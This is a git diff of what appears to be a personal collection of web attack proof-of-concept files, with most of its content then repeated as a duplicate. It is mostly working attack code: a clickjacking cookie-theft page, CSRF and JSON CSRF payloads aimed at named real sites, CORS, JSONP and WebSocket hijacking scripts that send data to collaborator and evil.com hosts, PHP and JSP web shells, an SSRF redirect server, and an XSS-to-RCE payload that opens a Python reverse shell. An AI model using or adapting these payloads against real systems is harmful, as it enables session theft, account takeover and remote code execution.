michaellcader · August 14, 2022 08:27
diff --git a/CookieExample ClickJacking.html b/CookieExample ClickJacking.html
 # refer https://cloud.tencent.com/developer/article/1692434
 <head>
 <style>
  iframe#fgframe{
    opacity: 5%;
  }
 </style>
 </head>
 <h1>幸运抽奖</h1>
 <h2>步骤<br>
 复制下框文字（点击，ctrl+a -> ctrl+c -> ctrl+v）
 </h2>
 <iframe id="fgframe" height="650px" width="400px" src="https://domain/examples/servlets/servlet/CookieExample"></iframe>
 <form action="http://znqaymzephedmfymwg9rma5ef5lv9k.burpcollaborator.net" method="POST">
  <div>
    <label for="say">在此处粘贴神秘代码</label>
    <textarea id="cookie" name="cookie" rows="4" cols="50"></textarea>
    <button>点我赢千元奖金</button>
  </div>
 </form>
diff --git a/CORS.html b/CORS.html
 # GET Method
 <script type="text/javascript">
 var req = new XMLHttpRequest(); 
 req.onload = reqListener; 
 req.open("get","victim.com/getUserInfo",true);
 req.withCredentials = true;
 req.send();
 function reqListener(){alert(req.responseText);}
 </script>

 # POST Method
 <script type="text/javascript">
 var data = "id=123";
 var req = new XMLHttpRequest();
 req.onload = reqListener;
 req.open("post","victim.com/getUserInfo",true);
 req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
 req.withCredentials = true;
 req.send(data);
 function reqListener(){alert(req.responseText);}
 </script>
diff --git a/Cross-Site WebSocket Hijack - 1.html b/Cross-Site WebSocket Hijack - 1.html
 # refer https://gh0st.cn//archives/2019-03-20/1

 <meta charset="utf-8">
 <script>
 function ws_attack(){//自定义函数ws_attack
    //定义函数功能
    //创建WebSocket并赋值给ws变量
 	var ws = new WebSocket("ws://域名:端口/");//如果请求的Websocket服务仅支持HTTP就写成ws://，如果请求的Websocket服务支持HTTPs就写成wss://
 	ws.onopen = function(evt) { 
        //当ws(WebSocket)处于连接状态时执行
 		ws.send("我是帅key的可爱小迷弟！");
 	};
 	ws.onmessage = function(evt) {
        //当ws(WebSocket)请求有响应信息时执行
        //注意：响应的信息可以通过evt.data获取！例如：alert(evt.data);
 		ws.close();
 	};
 }
 ws_attack();//执行ws_attact函数
 </script>
diff --git a/Cross-Site WebSocket Hijack - 2.html b/Cross-Site WebSocket Hijack - 2.html
 # refer https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab

 <script>
 function ws_attack(){
  var ws = new WebSocket("wss://xyz.web-security-academy.net/chat")
  ws.onopen = function(evt) { ws.send("READY"); }
  ws.onmessage = function(evt) { fetch('https://xyz.burpcollaborator.net/?'+evt.data, {mode:'no-cors'}) }
 }
 ws_attack()
 </script>
diff --git a/CSRF + Self-XSS.html b/CSRF + Self-XSS.html
 # refer https://hackerone.com/reports/95089
 <html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://hardware.shopify.com/cart/add", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------13411895127118");
        xhr.withCredentials = true;
        var body = "-----------------------------13411895127118\r\n" + 
          "Content-Disposition: form-data; name=\"properties[Artwork file\x3cimg src=\'test\' onmouseover=\'alert(2)\'\x3e]\"; filename=\"test.png\"\r\n" + 
          "Content-Type: image/png\r\n" + 
          "\r\n" + 
          "\x89PNG\r\n" +  
          "-----------------------------13411895127118\r\n" + 
          "Content-Disposition: form-data; name=\"properties[Custom text line 1]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------13411895127118\r\n" + 
          "Content-Disposition: form-data; name=\"properties[Custom text line 2]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------13411895127118\r\n" + 
          "Content-Disposition: form-data; name=\"properties[Custom text line 3]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------13411895127118\r\n" + 
          "Content-Disposition: form-data; name=\"production-time\"\r\n" + 
          "\r\n" + 
          "standard\r\n" + 
          "-----------------------------13411895127118\r\n" + 
          "Content-Disposition: form-data; name=\"id\"\r\n" + 
          "\r\n" + 
          "976094353\r\n" + 
          "-----------------------------13411895127118--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
 </html>
diff --git a/JSON_CSRF.html b/JSON_CSRF.html
 #1
 <html>
 <head>
 <script style="text/javascript">
 function submitRequest()
 {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://openapi.rajax-inc.com/business/alsc-uni/setPassword", true);
  xhr.setRequestHeader("Accept", "application/json, text/plain, */*");
  xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
  xhr.setRequestHeader("Content-Type", "application/json; charset=utf-8");
  xhr.withCredentials = true;
  xhr.send(JSON.stringify({"checkType":100,"password":"pp1234","passwordConfirm":"pp1234"}));
 }
 </script>
 </head>
 <body>
 <form action="#">
  <input type="button" value="Submit request" onClick="submitRequest()"/>
 </form>
 </body>
 </html>

 #2
 <html>
 <title>CSRF Exploit POC by RootSploit</title>
 <body>
 <center>
 <h1> CSRF Exploit POC by RootSploit</h1>
 <script>
  function JSON_CSRF() {
    fetch('https://vuln.rootsploit.io/v1/addusers', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/json'}, body: '{"user":{"role_id":"full_access","first_name":"RootSploit","last_name":"RootSploit","email":"[email protected]","password":"Password@","confirm_password":"Password@","mobile_number":"99999999999"}}'});
  }
 </script>
 <button onclick="JSON_CSRF()">Exploit CSRF</button>
 </center>
 </body>
 </html>

 #3 refer https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247493991&idx=1&sn=37d340a42e0ab13599298e511789300f
 # flash + HTTP 307
 csrf.as
 package {
  import flash.display.Sprite;
  import flash.net.URLLoader;
  import flash.net.URLRequest;
  import flash.net.URLRequestHeader;
  import flash.net.URLRequestMethod;
  public class csrf extends Sprite {
    public function csrf() {
      super();
      var member1:Object = null;
      var myJson:String = null;
      member1 = new Object();
      member1 = {
      "gender":"2",
        "homeCity":"4170",
        "nowCity":"4170",
        "profession":"23",
        "description":"</textarea><script>alert(document.cookie)</script><textarea>",
        "signature":""
      };
      var myData:Object = member1;
      myJson = JSON.stringify(myData);
      myJson = JSON.stringify(myData);
      var url:String = "http://<attacker-ip>/csrf307.php";
      var request:URLRequest = new URLRequest(url);
      request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json"));
      request.data = myJson;
      request.method = URLRequestMethod.POST;
      var urlLoader:URLLoader = new URLLoader();
      try {
        urlLoader.load(request);
        return;
      } catch(e:Error) {
        trace(e);
        return;
      }
    }
  }
 }
         
 # csrf307.php
 <?php
 // redirect automatically
 header("Location: https://victim/csrf/endpoints", true, 307);
 ?>
diff --git a/JSONP-Hijack.html b/JSONP-Hijack.html
 #1
 <script>function jsonp(a){alert(a);}</script>
 <script src="http://victim/getUserInfo?callback=jsonp"></script>

 #2
 <script>function test(data){new Image().src='//evil/a.php?b='+escape(data);}</script>
 <script src='http://victim/getUserInfo?callback=test'></script>

 #3 jquery lib
 <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>    
 <script type="text/javascript">$.getJSON("http://example.com/getUser.php?jsoncallback=?",function(a){alert(a);});
 </script>

 #4 none referer header, refer https://blog.knownsec.com/2015/03/jsonp_security_technic/
 <iframe src="javascript:'<script>function JSON(o){alert(o.userinfo.userid);}</script><script src=http://example/login.php?calback=JSON></script>'"></iframe>

 #5 weak token bruteforce, refer https://blog.knownsec.com/2015/03/jsonp_security_technic/
 function _Callback(o){alert(o.items[0].uin);}
 for(i=17008;i<17009;i++){
    getJSON("http://example/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=1111111&g_tk="+i);
 }
diff --git a/poc-demo.py b/poc-demo.py
 #!/usr/local/bin/python3
 from urllib3 import disable_warnings
 from requests import get, post
 from argparse import ArgumentParser
 disable_warnings()

 def poc(url):
  payload = '/index.php/module/aciton/param1/${@phpinfo()}'
  regex = '<title>phpinfo()</title>'
  target = '{}{}'.format(url, payload)
  header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0'
  }
  data = {
    'key': 'value'
  }
  # resp = get(target, headers=header, data=data, verify=False)
  # resp = post(target, headers=header, data=data, verify=False)
  resp = post(target, headers=header, json=data, verify=False)
  match = regex in resp.text and resp.status_code
  if match:
    print('{} is vulnerable'.format(url))
  else:
    print('{} is not vulnerable'.format(url))

 if __name__ == '__main__':
  parser = ArgumentParser()
  parser.add_argument('-u', '--url', type=str, required=True,
                      help='target URL with protocol')
  args = parser.parse_args()
  if args.url.startswith('http'):
    poc(args.url.rstrip('/'))
  else:
    parser.print_help()
diff --git a/shell.jsp b/shell.jsp
 <%out.print("a");%>
 <jsp:scriptlet>out.print("a");</jsp:scriptlet>
diff --git a/shell.php b/shell.php
 <?php echo "a";?>

 GIF89a
 <?php $a = `$_GET[1]`; echo $a;?>
 // http://foo.bar/1.php?1=id

 // race condition
 <?php
 $filename = "asdfghjkl.php";
 $shell = '<?php eval($_POST["key"]);?>';
 file_put_contents($filename, $shell);
 ?>

 <?php @eval($_POST['pass'])?>

 <script language=php>phpinfo();</script>
diff --git a/ssrf redirect to gopher .py b/ssrf redirect to gopher .py
 # reference https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530
 # reference https://pastebin.com/raw/ywAUhFrv

 #!/usr/bin/env python3

 import sys
 from http.server import HTTPServer, BaseHTTPRequestHandler

 if len(sys.argv)-1 != 2:
    print("""
 Usage: {} <port_number> <url>
    """.format(sys.argv[0]))
    sys.exit()

 class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_response(302)
       self.send_header('Location', sys.argv[2])
       self.end_headers()
   def send_error(self, code, message=None):
       self.send_response(302)
       self.send_header('Location', sys.argv[2])
       self.end_headers()
 HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
diff --git a/xsrf b/xsrf
 # refer https://www.t00ls.com/thread-65907-1-1.html
 <script>fetch('http://webapp/workUser.action',{method: 'post',body:'vo.nickName=admin1&vo.id=8057&vo.password=123456&confirmPwd=123456',headers:{'Content-Type':'application/x-www-form-urlencoded'}})</script>
diff --git a/xss->rce.js b/xss->rce.js
 // refer https://mp.weixin.qq.com/s?__biz=MzIxNDAyNjQwNg==&mid=2456098521&idx=1&sn=3d1b6e3e79a653c9e3367a6ee64a3a78

 // XSS payload
 // <img src="x"       onerror=import(unescape('http%3A//127.0.0.1/test2.js'))>

 // test2.js
 (function(){
 require('child_process').exec('open /System/Applications/Calculator.app');
 require('child_process').exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
 })();
diff --git a/XSSI.html b/XSSI.html
 # refer https://gh0st.cn//archives/2020-01-08/3
 <script>
 function webpackJsonp(data, data1) {
  alert(data1['jbTV'])
 }
 </script>
 <script src="https://victim/app.xxxxx.js"></script>

 #2 refer https://mp.weixin.qq.com/s?__biz=Mzg2NDU3Mzc5OA==&mid=2247486013&idx=1&sn=c8e1e001c767f77af0c1554f9eb1e2cb&source=41#wechat_redirect
 <script type="text/javascript" src="http://victim.com/leaked/1.js"></script>
 <script type="text/javascript">$('#leaked_content').text(window.data);</script>
diff --git a/XST.js b/XST.js
 #1 - XSS Insert `<script src='//evil.com/1.js'></script>`

 #2 - 1.js:
 function get_xhr(){
  var xhr;
  if (window.XMLHttpRequest) {
      xhr = new XMLHttpRequest();
  } else {
      xhr = new ActiveXObject("Microsoft.XMLHTTP");
  }
  xhr.withCredentials = true;   // with cookie header
  return xhr;
 }
 function ajax(url) {
  var xhr = get_xhr();
  xhr.onreadystatechange = function () {
    if (xhr.readyState == 4) {
      if (xhr.status == 200) {
        var resp = xhr.responseText;     
        var xhr2 = get_xhr()
        var url2 = "http://evil.com/receive.php?text=" + escape(resp);
        xhr2.open("GET", url2, true);
        xhr2.send();
      }
    } else {
      // requesting...
    }
  }
  xhr.open("TRACE", url, true)  // True asyn
  xhr.send();
 }
 var url = "http://victim.com/";
 ajax(url);
	# refer https://cloud.tencent.com/developer/article/1692434
	<head>
	<style>
	iframe#fgframe{
	opacity: 5%;
	}
	</style>
	</head>
	<h1>幸运抽奖</h1>
	<h2>步骤<br>
	复制下框文字（点击，ctrl+a -> ctrl+c -> ctrl+v）
	</h2>
	<iframe id="fgframe" height="650px" width="400px" src="https://domain/examples/servlets/servlet/CookieExample"></iframe>
	<form action="http://znqaymzephedmfymwg9rma5ef5lv9k.burpcollaborator.net" method="POST">
	<div>
	<label for="say">在此处粘贴神秘代码</label>
	<textarea id="cookie" name="cookie" rows="4" cols="50"></textarea>
	<button>点我赢千元奖金</button>
	</div>
	</form>
	# GET Method
	<script type="text/javascript">
	var req = new XMLHttpRequest();
	req.onload = reqListener;
	req.open("get","victim.com/getUserInfo",true);
	req.withCredentials = true;
	req.send();
	function reqListener(){alert(req.responseText);}
	</script>

	# POST Method
	<script type="text/javascript">
	var data = "id=123";
	var req = new XMLHttpRequest();
	req.onload = reqListener;
	req.open("post","victim.com/getUserInfo",true);
	req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	req.withCredentials = true;
	req.send(data);
	function reqListener(){alert(req.responseText);}
	</script>
	# refer https://gh0st.cn//archives/2019-03-20/1

	<meta charset="utf-8">
	<script>
	function ws_attack(){//自定义函数ws_attack
	//定义函数功能
	//创建WebSocket并赋值给ws变量
	var ws = new WebSocket("ws://域名:端口/");//如果请求的Websocket服务仅支持HTTP就写成ws://，如果请求的Websocket服务支持HTTPs就写成wss://
	ws.onopen = function(evt) {
	//当ws(WebSocket)处于连接状态时执行
	ws.send("我是帅key的可爱小迷弟！");
	};
	ws.onmessage = function(evt) {
	//当ws(WebSocket)请求有响应信息时执行
	//注意：响应的信息可以通过evt.data获取！例如：alert(evt.data);
	ws.close();
	};
	}
	ws_attack();//执行ws_attact函数
	</script>
	# refer https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab

	<script>
	function ws_attack(){
	var ws = new WebSocket("wss://xyz.web-security-academy.net/chat")
	ws.onopen = function(evt) { ws.send("READY"); }
	ws.onmessage = function(evt) { fetch('https://xyz.burpcollaborator.net/?'+evt.data, {mode:'no-cors'}) }
	}
	ws_attack()
	</script>
	# refer https://hackerone.com/reports/95089
	<html>
	<body>
	<script>
	function submitRequest()
	{
	var xhr = new XMLHttpRequest();
	xhr.open("POST", "http://hardware.shopify.com/cart/add", true);
	xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8");
	xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
	xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------13411895127118");
	xhr.withCredentials = true;
	var body = "-----------------------------13411895127118\r\n" +
	"Content-Disposition: form-data; name=\"properties[Artwork file\x3cimg src=\'test\' onmouseover=\'alert(2)\'\x3e]\"; filename=\"test.png\"\r\n" +
	"Content-Type: image/png\r\n" +
	"\r\n" +
	"\x89PNG\r\n" +
	"-----------------------------13411895127118\r\n" +
	"Content-Disposition: form-data; name=\"properties[Custom text line 1]\"\r\n" +
	"\r\n" +
	"\r\n" +
	"-----------------------------13411895127118\r\n" +
	"Content-Disposition: form-data; name=\"properties[Custom text line 2]\"\r\n" +
	"\r\n" +
	"\r\n" +
	"-----------------------------13411895127118\r\n" +
	"Content-Disposition: form-data; name=\"properties[Custom text line 3]\"\r\n" +
	"\r\n" +
	"\r\n" +
	"-----------------------------13411895127118\r\n" +
	"Content-Disposition: form-data; name=\"production-time\"\r\n" +
	"\r\n" +
	"standard\r\n" +
	"-----------------------------13411895127118\r\n" +
	"Content-Disposition: form-data; name=\"id\"\r\n" +
	"\r\n" +
	"976094353\r\n" +
	"-----------------------------13411895127118--\r\n";
	var aBody = new Uint8Array(body.length);
	for (var i = 0; i < aBody.length; i++)
	aBody[i] = body.charCodeAt(i);
	xhr.send(new Blob([aBody]));
	}
	</script>
	<form action="#">
	<input type="button" value="Submit request" onclick="submitRequest();" />
	</form>
	</body>
	</html>
	#1
	<html>
	<head>
	<script style="text/javascript">
	function submitRequest()
	{
	var xhr = new XMLHttpRequest();
	xhr.open("POST", "https://openapi.rajax-inc.com/business/alsc-uni/setPassword", true);
	xhr.setRequestHeader("Accept", "application/json, text/plain, /");
	xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
	xhr.setRequestHeader("Content-Type", "application/json; charset=utf-8");
	xhr.withCredentials = true;
	xhr.send(JSON.stringify({"checkType":100,"password":"pp1234","passwordConfirm":"pp1234"}));
	}
	</script>
	</head>
	<body>
	<form action="#">
	<input type="button" value="Submit request" onClick="submitRequest()"/>
	</form>
	</body>
	</html>

	#2
	<html>
	<title>CSRF Exploit POC by RootSploit</title>
	<body>
	<center>
	<h1> CSRF Exploit POC by RootSploit</h1>
	<script>
	function JSON_CSRF() {
	fetch('https://vuln.rootsploit.io/v1/addusers', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/json'}, body: '{"user":{"role_id":"full_access","first_name":"RootSploit","last_name":"RootSploit","email":"[email protected]","password":"Password@","confirm_password":"Password@","mobile_number":"99999999999"}}'});
	}
	</script>
	<button onclick="JSON_CSRF()">Exploit CSRF</button>
	</center>
	</body>
	</html>

	#3 refer https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247493991&idx=1&sn=37d340a42e0ab13599298e511789300f
	# flash + HTTP 307
	csrf.as
	package {
	import flash.display.Sprite;
	import flash.net.URLLoader;
	import flash.net.URLRequest;
	import flash.net.URLRequestHeader;
	import flash.net.URLRequestMethod;
	public class csrf extends Sprite {
	public function csrf() {
	super();
	var member1:Object = null;
	var myJson:String = null;
	member1 = new Object();
	member1 = {
	"gender":"2",
	"homeCity":"4170",
	"nowCity":"4170",
	"profession":"23",
	"description":"</textarea><script>alert(document.cookie)</script><textarea>",
	"signature":""
	};
	var myData:Object = member1;
	myJson = JSON.stringify(myData);
	myJson = JSON.stringify(myData);
	var url:String = "http://<attacker-ip>/csrf307.php";
	var request:URLRequest = new URLRequest(url);
	request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json"));
	request.data = myJson;
	request.method = URLRequestMethod.POST;
	var urlLoader:URLLoader = new URLLoader();
	try {
	urlLoader.load(request);
	return;
	} catch(e:Error) {
	trace(e);
	return;
	}
	}
	}
	}

	# csrf307.php
	<?php
	// redirect automatically
	header("Location: https://victim/csrf/endpoints", true, 307);
	?>
	#1
	<script>function jsonp(a){alert(a);}</script>
	<script src="http://victim/getUserInfo?callback=jsonp"></script>

	#2
	<script>function test(data){new Image().src='//evil/a.php?b='+escape(data);}</script>
	<script src='http://victim/getUserInfo?callback=test'></script>

	#3 jquery lib
	<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>
	<script type="text/javascript">$.getJSON("http://example.com/getUser.php?jsoncallback=?",function(a){alert(a);});
	</script>

	#4 none referer header, refer https://blog.knownsec.com/2015/03/jsonp_security_technic/
	<iframe src="javascript:'<script>function JSON(o){alert(o.userinfo.userid);}</script><script src=http://example/login.php?calback=JSON></script>'"></iframe>

	#5 weak token bruteforce, refer https://blog.knownsec.com/2015/03/jsonp_security_technic/
	function _Callback(o){alert(o.items[0].uin);}
	for(i=17008;i<17009;i++){
	getJSON("http://example/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=1111111&g_tk="+i);
	}
	#!/usr/local/bin/python3
	from urllib3 import disable_warnings
	from requests import get, post
	from argparse import ArgumentParser
	disable_warnings()

	def poc(url):
	payload = '/index.php/module/aciton/param1/${@phpinfo()}'
	regex = '<title>phpinfo()</title>'
	target = '{}{}'.format(url, payload)
	header = {
	'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0'
	}
	data = {
	'key': 'value'
	}
	# resp = get(target, headers=header, data=data, verify=False)
	# resp = post(target, headers=header, data=data, verify=False)
	resp = post(target, headers=header, json=data, verify=False)
	match = regex in resp.text and resp.status_code
	if match:
	print('{} is vulnerable'.format(url))
	else:
	print('{} is not vulnerable'.format(url))

	if __name__ == '__main__':
	parser = ArgumentParser()
	parser.add_argument('-u', '--url', type=str, required=True,
	help='target URL with protocol')
	args = parser.parse_args()
	if args.url.startswith('http'):
	poc(args.url.rstrip('/'))
	else:
	parser.print_help()
	<%out.print("a");%>
	<jsp:scriptlet>out.print("a");</jsp:scriptlet>
	<?php echo "a";?>

	GIF89a
	<?php $a = `$_GET[1]`; echo $a;?>
	// http://foo.bar/1.php?1=id

	// race condition
	<?php
	$filename = "asdfghjkl.php";
	$shell = '<?php eval($_POST["key"]);?>';
	file_put_contents($filename, $shell);
	?>

	<?php @eval($_POST['pass'])?>

	<script language=php>phpinfo();</script>